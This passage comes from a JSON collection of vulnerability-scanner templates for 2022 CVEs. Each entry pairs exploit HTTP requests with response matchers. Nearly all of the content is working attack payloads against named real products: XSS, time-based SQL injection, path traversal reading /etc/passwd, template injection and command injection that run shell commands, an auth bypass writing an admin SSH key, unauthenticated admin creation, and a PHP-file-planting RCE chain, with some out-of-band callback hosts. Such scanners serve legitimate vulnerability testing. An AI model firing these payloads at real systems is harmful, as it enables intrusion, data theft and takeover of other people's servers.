application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["<script>alert(document.domain)</script>","SESSION_TIMEOUT"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"username_fieldname_2","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-34047","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /set_safety.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-22954","info":{"name":"VMware Workspace ONE Access - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Authorization context is not valid"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-1054","info":{"name":"WordPress RSVP and Event Management <2.7.8 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RSVP Status","\"First Name\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45354","info":{"name":"Download Monitor <= 4.7.60 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/download-monitor/v1/user_data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered\":","\"display_name\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1713","info":{"name":"Drawio <18.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /proxy?url=http%3a//0:8080/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Flowchart Maker & Online Diagram Software</title>"]},{"type":"word","part":"header","words":["application/octet-stream"]}]}]},{"id":"CVE-2022-25497","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//../../../../../../../../../../../../../etc/passwd\",\"to\":\"/../{{randstr}}.txt\",\"action\":\"copyFile\"}\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1168","info":{"name":"WordPress WP JobSearch <1.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(domain)>","wp-jobsearch"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-2599","info":{"name":"WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","GOTMLS_mt"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0591","info":{"name":"Formcraft3 <3.8.28 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/formcraft3/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: WordPress"]}]}]},{"id":"CVE-2022-24637","info":{"name":"Open Web Analytics 1.7.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nowa_user_id=admin&owa_password=wrong+password+xyz&owa_go=&owa_action=base.login&owa_submit_btn=Login\n"],"matchers":[{"type":"word","part":"body","words":["Login Failed"],"internal":true}]},{"raw":["GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","group":1,"name":"serializedobj","internal":true,"regex":["<\\?php\\\\n\\/\\*([A-Za-z0-9=]+)\\*\\/\\\\n\\?>"]}],"matchers":[{"type":"word","part":"body","words":["<?php\\n"],"internal":true}]},{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nowa_password={{password}}&owa_password2={{password}}&owa_k={{javascript_response}}&owa_action=base.usersChangePassword&owa_submit_btn=Save+Your+New+Password\n"],"matchers":[{"type":"dsl","dsl":["contains(location,'owa_status_code=3006')","status_code==302"],"internal":true,"condition":"and"}]},{"raw":["POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nowa_user_id=admin&owa_password={{password}}&owa_go=&owa_action=base.login&owa_submit_btn=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(set_cookie,'owa_p')","status_code==302"],"internal":true,"condition":"and"}]},{"raw":["GET /index.php?owa_do=base.optionsGeneral HTTP/1.1\nCookie: owa_p={{http_4_owa_p}};owa_u=admin;\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","group":1,"name":"nonce","internal":true,"regex":["name=\"owa_nonce\" value=\"([a-z0-9]+)\">"]}]},{"raw":["POST /index.php?owa_do=base.optionsGeneral HTTP/1.1\nHost: {{Hostname}}\nCookie: owa_p={{http_4_owa_p}};owa_u=admin;\nContent-Type: application/x-www-form-urlencoded\n\nowa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[base.error_log_file]=owa-data/caches/{{randstr}}.php&owa_config[base.error_log_level]=2\n"]},{"raw":["POST /index.php?owa_do=base.optionsGeneral HTTP/1.1\nHost: {{Hostname}}\nCookie: owa_p={{http_4_owa_p}};owa_u=admin;\nContent-Type: application/x-www-form-urlencoded\n\nowa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[shell]=<?php+echo base64_decode('{{secret_b64}}');?>\n","GET /owa-data/caches/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[debug_log]","{{secret}}"],"condition":"and"}]}]},{"id":"CVE-2022-0846","info":{"name":"SpeakOut Email Petitions < 2.14.15.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Your signature has been added\") || contains(body, \"This petition has already been signed using your email address\")"],"condition":"and"}]}]},{"id":"CVE-2022-25369","info":{"name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Success\": true","\"Success\":true"],"condition":"or"},{"type":"word","part":"header","words":["application/json","ASP.NET_SessionId"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32444","info":{"name":"u5cms v8.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginsave.php?u=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-33901","info":{"name":"WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34048","info":{"name":"Wavlink WN-533A8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x\");alert(9);x=(\"&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x\");alert(9);x=(\"?login=0\");</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36537","info":{"name":"ZK Framework - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /login.zul HTTP/1.1\nHost: {{Hostname}}\n","POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Length: 154\n\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Disposition: form-data; name=\"nextURI\"\n\n/WEB-INF/web.xml\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp--\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<display-name>.*</display-name>","<welcome-file-list>((.|\n)*)welcome-file-list>","xml version","web-app"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"dtid","group":1,"regex":["dt:'(.*?)',cu:"],"internal":true}]}]},{"id":"CVE-2022-0228","info":{"name":"Popup Builder < 4.0.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin-post.php?action=csv_file&orderby=email%2c(select+*+from(select(sleep(7)))b)&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains_all(body_2, \"first name\", \"last name\", \"email\")","contains(content_type_2, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2022-29014","info":{"name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ubus/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"4183f72884a98d7952d953dd9439a1d1\",\"file\",\"read\",{\"path\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43018","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>:0"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28290","info":{"name":"WordPress Country Selector <1.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","country_selector_"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25488","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/{{md5(num)}}","avatar-container"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26833","info":{"name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","severity":"critical"},"requests":[{"raw":["POST /OASREST/v2/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nContent-Type: application/json\n\n{\"username\": \"\", \"password\": \"\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"status\":","\"data\":","\"token\":","\"clientid\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44952","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NAME]\"\n\nTest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SHORT_NAME]\"\n\ntest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_LOGO\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO_URL]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_FAVICON\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FAVICON]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_COPYRIGHT_NAME]\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LANGUAGE]\"\n\nenglish.php\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SKIN]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_TIMEZONE]\"\n\nAmerica/New_York\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_ROWS_PER_PAGE]\"\n\n10\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATE_FORMAT]\"\n\nm/d/Y\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATETIME_FORMAT]\"\n\nm/d/Y H:i\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NUMBER_FORMAT]\"\n\n2/./*\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FIRST_DAY_OF_WEEK]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DROP_DOWN_MENU_ON_HOVER]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DISABLE_CHECK_FOR_UPDATES]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA--\n","@timeout: 5s\nGET /index.php?module=dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"<script>alert(document.domain)</script>\")","contains(body_4, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-24856","info":{"name":"Flyte Console <0.52.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cors_proxy/https://oast.me/"],"matchers":[{"type":"word","words":["Interactsh Server"]}]}]},{"id":"CVE-2022-0381","info":{"name":"WordPress Embed Swagger <=1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/embed-swagger/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Embed Swagger","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["url: \"xss://\"-alert(document.domain)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3578","info":{"name":"WordPress ProfileGrid <5.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pm_add_group&id=\"><script>alert%28document.domain%29<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, \"Extension Options\")","contains(body_2, \"<script>alert(document.domain)</script>&tab\")"],"condition":"and"}]}]},{"id":"CVE-2022-4059","info":{"name":"Cryptocurrency Widgets Pack < 2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=7","len(body_1) == 0","status_code_1 == 302","contains(body_2, \"Cryptocurrency Widgets Pack\")"],"condition":"and"}]}]},{"id":"CVE-2022-40083","info":{"name":"Labstack Echo 4.8.0 - Open Redirect","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}//interactsh.com%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"location","regex":["^\\s*//interactsh.com/\\.\\."]},{"type":"status","status":[301]}]}]},{"id":"CVE-2022-42746","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-2187","info":{"name":"WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&\"></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","Contact Form 7"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1013","info":{"name":"WordPress Personal Dictionary <1.3.4 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(7)))CEHy)--+-\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"\\\"status\\\":true,\")"],"condition":"and"}]}]},{"id":"CVE-2022-0412","info":{"name":"WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["Product not found"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-47615","info":{"name":"LearnPress Plugin < 4.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["\"status\":","\"pagination\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28219","info":{"name":"Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/agent/tabs/agentData"],"body":"[\n  {\n    \"DomainName\": \"{{Host}}\",\n    \"EventCode\": 4688,\n    \"EventType\": 0,\n    \"TimeGenerated\": 0,\n    \"Task Content\": \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><! foo [ <!ENTITY % xxe SYSTEM \\\"http://{{interactsh-url}}\\\"> %xxe; ]>\"\n  }\n]\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["ManageEngine"]}]}]},{"id":"CVE-2022-31474","info":{"name":"BackupBuddy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36446","info":{"name":"Webmin <1.997 - Authenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}\n","POST /package-updates/update.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1\n\nmode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}","uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40684","info":{"name":"Fortinet - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v2/cmdb/system/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Node.js\nForwarded: by=\"[127.0.0.1]:1337\";for=\"[127.0.0.1]:1337\";proto=http;host=\nX-Forwarded-Vdom: root\n","PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Report Runner\nContent-Type: application/json\nForwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\nContent-Length: 610\n\n {\n  \"ssh-public-key1\":\"{{randstr}}\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body_1","words":["ENC XXXX","http_method"],"condition":"and"},{"type":"word","part":"body_2","words":["Invalid SSH public key.","cli_error"],"condition":"and"}]}]},{"id":"CVE-2022-4325","info":{"name":"WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<script>alert(`document.domain`)</script>\")","contains(body_2, \"Post Status Notifier Lite\")"],"condition":"and"}]}]},{"id":"CVE-2022-28365","info":{"name":"Reprise License Manager 14.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/rlminfo"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Version","Platform type"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40734","info":{"name":"Laravel Filemanager v2.5.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd","{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"],"stop-at-first-match":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-31499","info":{"name":"Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1\nHost: 